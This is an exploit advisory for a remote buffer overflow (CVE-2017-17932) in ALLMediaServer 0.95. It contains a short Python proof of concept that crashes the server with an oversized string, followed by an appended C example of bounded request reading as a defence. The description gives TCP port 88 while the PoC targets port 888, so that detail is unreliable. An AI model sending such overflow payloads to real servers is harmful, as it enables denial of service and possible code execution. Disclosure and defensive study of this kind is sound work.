ALLMediaServer 0.95 - Buffer Overflow
Source: https://twitter.com/aloycemjr  Author: Makalanga  Published: 2017-12-28
# Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
# CVE: CVE-2017-17932
# Date: 27-12-2017
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.allmediaserver.org/
# Category: webapps
# Attack Type: Remote
# Impact: Code execution and/or Denial of Service

1. Description

A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. To exploit this vulnerability, an attacker must connect to the server with a long malicious string.

2. Proof of Concept

#!/usr/bin/python
#NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work.

def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.205.131', 888))
    buffer = "A" * 3000
    s.send(buffer)
    s.close()

if __name__ == '__main__':
    import socket
    main()
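
The advisory does not show the affected routine in MediaServer.exe. As an added example (not the vendor's code and not from the original advisory), the C below shows the defensive pattern for this bug class: a request reader that limits every recv() to the space left in a fixed buffer and rejects an over-long request such as the PoC's 3000-byte string. The names read_request and demo, the REQ_MAX size and the "\r\n\r\n" terminator are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define REQ_MAX 1024  /* assumed cap; the real buffer size is not on the page */
enum req_status { REQ_OK = 0, REQ_TOO_LONG = -1, REQ_CLOSED = -2 };

/* Read one request into buf until "\r\n\r\n" (assumed terminator).
 * Each recv() is limited to the space left, so nothing is written past
 * buf[REQ_MAX - 1]; a request that fills the buffer is rejected. */
enum req_status read_request(int fd, char buf[REQ_MAX], size_t *len)
{
    size_t used = 0;
    for (;;) {
        size_t room = REQ_MAX - 1 - used;      /* reserve one byte for NUL */
        if (room == 0) return REQ_TOO_LONG;    /* cap reached, no terminator */
        ssize_t n = recv(fd, buf + used, room, 0);
        if (n <= 0) return REQ_CLOSED;         /* peer closed or error */
        used += (size_t)n;
        buf[used] = '\0';
        if (strstr(buf, "\r\n\r\n") != NULL) { *len = used; return REQ_OK; }
    }
}

/* Constructed input: `total` bytes of 'A', optionally followed by the terminator,
 * sent over a local socketpair so the check runs offline. */
enum req_status demo(size_t total, int terminate, size_t *len)
{
    int sv[2];
    char buf[REQ_MAX], payload[4096];
    if (total > sizeof payload - 4 || socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return REQ_CLOSED;
    memset(payload, 'A', total);
    if (terminate) { memcpy(payload + total, "\r\n\r\n", 4); total += 4; }
    ssize_t w = write(sv[0], payload, total);
    shutdown(sv[0], SHUT_WR);
    enum req_status st = w < 0 ? REQ_CLOSED : read_request(sv[1], buf, len);
    close(sv[0]); close(sv[1]);
    return st;
}

int main(void)
{
    size_t len = 0;
    printf("short request: %d\n", demo(100, 1, &len));
    printf("3000 x 'A':    %d\n", demo(3000, 0, &len));
    return 0;
}
```

A request that is rejected with REQ_TOO_LONG should cause the connection to be closed and the event logged, which also gives defenders a signal for oversized input arriving at the service port.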